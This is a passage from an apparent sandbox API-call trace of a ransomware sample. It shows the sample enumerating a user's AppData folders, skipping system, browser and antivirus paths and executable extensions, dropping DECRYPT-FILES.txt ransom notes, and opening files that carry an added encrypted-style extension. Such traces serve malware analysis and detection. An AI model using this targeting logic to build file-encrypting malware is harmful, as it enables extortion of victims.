HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" [0180.648] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28c [0180.648] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x36fd5b8 | out: lpFileSize=0x36fd5b8*=0) returned 1 [0180.648] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0180.649] CloseHandle (hObject=0x0) returned 0 [0180.649] CloseHandle (hObject=0x28c) returned 1 [0180.649] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.649] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0180.649] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0180.649] CloseHandle (hObject=0x284) returned 1 [0180.649] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk\\", cAlternateFileName="_HIDDE~1")) returned 0 [0180.649] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.649] CloseHandle (hObject=0x27c) returned 1 [0180.649] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk\\", cAlternateFileName="")) returned 0 [0180.649] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.649] CloseHandle (hObject=0x274) returned 1 [0180.649] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab7c980, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.649] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.649] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab7c980, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaab7c980, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaab7c980, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.650] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.650] CloseHandle (hObject=0x26c) returned 1 [0180.650] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaac14f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac14f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0180.650] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0180.650] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0180.650] lstrcatW (in: lpString1="Office", lpString2="\\" | out: lpString1="Office\\") returned="Office\\" [0180.650] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Office\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Program Files") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch=":\\Windows") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Games\\") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\All Users") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="AhnLab") returned 0x0 [0180.650] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.650] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0180.650] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.650] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\\\0a16c9.tmp") returned 74 [0180.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0180.652] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.652] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\\\DECRYPT-FILES.txt") returned 81 [0180.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.652] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0180.652] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*" [0180.652] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeecc9ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecc9ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.652] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43c8ae30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeecc9ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecc9ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.652] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.652] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.653] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeecc9ec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeecc9ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecc9ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.653] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.653] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.653] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.653] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.653] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.653] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.653] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0180.653] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.653] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" [0180.653] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\0a16c9.tmp" [0180.653] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.653] CloseHandle (hObject=0x0) returned 0 [0180.653] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.654] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaabc8c40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaabc8c40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaabc8c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.654] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.654] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4f6ce7b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f6ce7b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaabeeda0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x948a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl.DmSyl0G", cAlternateFileName="MSO103~1.DMS")) returned 1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="DECRYPT-FILES.txt") returned 1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="autorun.inf") returned 1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="boot.ini") returned 1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="desktop.ini") returned 1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="ntuser.dat") returned -1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="iconcache.db") returned 1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="bootsect.bak") returned 1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="ntuser.dat.log") returned -1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="thumbs.db") returned -1 [0180.654] lstrcmpiW (lpString1="MSO1033.acl.DmSyl0G", lpString2="Bootfont.bin") returned 1 [0180.654] lstrlenW (lpString="MSO1033.acl.DmSyl0G") returned 19 [0180.654] lstrcmpiW (lpString1="DmSyl0G", lpString2="lnk") returned -1 [0180.654] lstrcmpiW (lpString1="DmSyl0G", lpString2="exe") returned -1 [0180.654] lstrcmpiW (lpString1="DmSyl0G", lpString2="sys") returned -1 [0180.654] lstrcmpiW (lpString1="DmSyl0G", lpString2="dll") returned 1 [0180.654] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned 63 [0180.654] lstrlenW (lpString="MSO1033.acl.DmSyl0G") returned 19 [0180.654] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\" [0180.654] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="MSO1033.acl.DmSyl0G" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.DmSyl0G") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.DmSyl0G" [0180.654] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.DmSyl0G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl.dmsyl0g"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0180.655] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=38026) returned 1 [0180.655] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0180.655] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.656] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.656] CloseHandle (hObject=0x278) returned 1 [0180.656] CloseHandle (hObject=0x274) returned 1 [0180.656] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.656] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaac3b060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaac3b060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0180.656] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0180.656] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0180.656] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0180.656] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Program Files") returned 0x0 [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch=":\\Windows") returned 0x0 [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Games\\") returned 0x0 [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.656] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\All Users") returned 0x0 [0180.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="AhnLab") returned 0x0 [0180.657] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.657] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0180.657] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.657] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\0a16c9.tmp") returned 81 [0180.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.659] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0180.659] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.659] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\DECRYPT-FILES.txt") returned 88 [0180.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.659] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 70 [0180.659] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0180.659] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeecf0020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecf0020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.659] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.659] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5dae0390, ftCreationTime.dwHighDateTime=0x1d2dda4, 